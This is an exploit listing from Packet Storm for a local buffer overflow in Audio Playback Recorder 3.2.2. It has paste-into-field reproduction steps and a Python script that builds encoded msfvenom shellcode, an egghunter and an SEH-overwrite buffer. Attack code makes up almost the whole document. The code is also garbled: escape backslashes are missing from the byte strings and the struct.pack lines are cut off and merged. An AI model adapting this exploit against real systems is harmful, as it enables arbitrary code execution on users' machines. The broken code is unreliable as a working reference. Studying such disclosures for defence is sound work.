Audio Playback Recorder 3.2.2 Local Buffer Overflow ≈ Packet Storm
# Date: 2020-09-08
# Author: Felipe Winsnes
# Software Link: https://archive.org/download/tucows_288670_Audio_Playback_Recorder/AudioRec.exe
# Version: 3.2.2
# Tested on: Windows 7 (x86)
# Blog: https://whitecr0wz.github.io/
# Proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings11/11-proof.gif
# Proof of Concept:
# 1.- Run the python script, it will create the file "poc.txt" & "buf.txt".
# 2.- Copy the content of the new file "buf.txt" to clipboard.
# 3.- Open the application.
# 4.- Click on the bottom-right blue button to eject.
# 5.- Delete everything on the parameter and paste the clipboard (buf.txt).
# 6.- Click eject once again to close it.
# 7.- Copy poc.txt to the clipboard.
# 8.- Click on "Register".
# 9.- Paste clipboard (poc.txt) on the parameter "Name".
# 10.- Profit.
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes
buf = b"w00tw00t"
buf += b"x89xe2xdaxd4xd9x72xf4x59x49x49x49x49x49"
buf += b"x49x49x49x49x49x49x43x43x43x43x43x43x37"
buf += b"x51x5ax6ax41x58x50x30x41x30x41x6bx41x41"
buf += b"x51x32x41x42x32x42x42x30x42x42x41x42x58"
buf += b"x50x38x41x42x75x4ax49x69x6cx4bx58x6dx52"
buf += b"x63x30x47x70x63x30x61x70x6bx39x4ax45x65"
buf += b"x61x4fx30x33x54x6ex6bx30x50x66x50x6cx4b"
buf += b"x62x72x54x4cx4cx4bx33x62x32x34x4cx4bx42"
buf += b"x52x64x68x64x4fx4dx67x42x6ax37x56x36x51"
buf += b"x39x6fx4ex4cx67x4cx50x61x31x6cx45x52x36"
buf += b"x4cx45x70x7ax61x78x4fx46x6dx37x71x4ax67"
buf += b"x79x72x78x72x36x32x43x67x6ex6bx56x32x34"
buf += b"x50x6ex6bx51x5ax77x4cx6ex6bx52x6cx74x51"
buf += b"x34x38x49x73x53x78x67x71x48x51x30x51x6e"
buf += b"x6bx62x79x37x50x56x61x6ax73x6cx4bx63x79"
buf += b"x45x48x79x73x47x4ax42x69x6cx4bx44x74x6c"
buf += b"x4bx56x61x68x56x76x51x59x6fx4cx6cx79x51"
buf += b"x58x4fx54x4dx77x71x39x57x76x58x4bx50x53"
buf += b"x45x38x76x47x73x71x6dx5ax58x37x4bx31x6d"
buf += b"x46x44x71x65x4ax44x33x68x4ex6bx36x38x57"
buf += b"x54x36x61x6ax73x43x56x6cx4bx54x4cx50x4b"
buf += b"x6cx4bx36x38x57x6cx75x51x6bx63x4cx4bx45"
buf += b"x54x4cx4bx65x51x6ax70x6fx79x73x74x57x54"
buf += b"x76x44x33x6bx63x6bx43x51x72x79x72x7ax63"
buf += b"x61x6bx4fx49x70x61x4fx63x6fx61x4ax4cx4b"
buf += b"x62x32x4ax4bx4ex6dx73x6dx61x7ax57x71x6c"
buf += b"x4dx4fx75x4cx72x47x70x65x50x35x50x56x30"
buf += b"x63x58x50x31x6ex6bx32x4fx4cx47x49x6fx79"
buf += b"x45x6dx6bx6dx30x47x6dx76x4ax65x5ax33x58"
buf += b"x49x36x7ax35x6dx6dx4dx4dx49x6fx4ex35x37"
buf += b"x4cx37x76x51x6cx35x5ax6fx70x6bx4bx4bx50"
buf += b"x63x45x54x45x6fx4bx53x77x54x53x71x62x70"
buf += b"x6fx50x6ax35x50x46x33x79x6fx68x55x31x73"
buf += b"x53x51x70x6cx43x53x56x4ex62x45x73x48x71"
buf += b"x75x67x70x41x41"
egg = ""
egg += "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
egg += "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7"
nseh = struct.pack("seh = struct.pack("
buffer = "A" * 456 + nseh + seh + "A" * 5 + egg + "xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
f = open ("buf.txt", "w")
f.write(buf)
f.close()
Gloss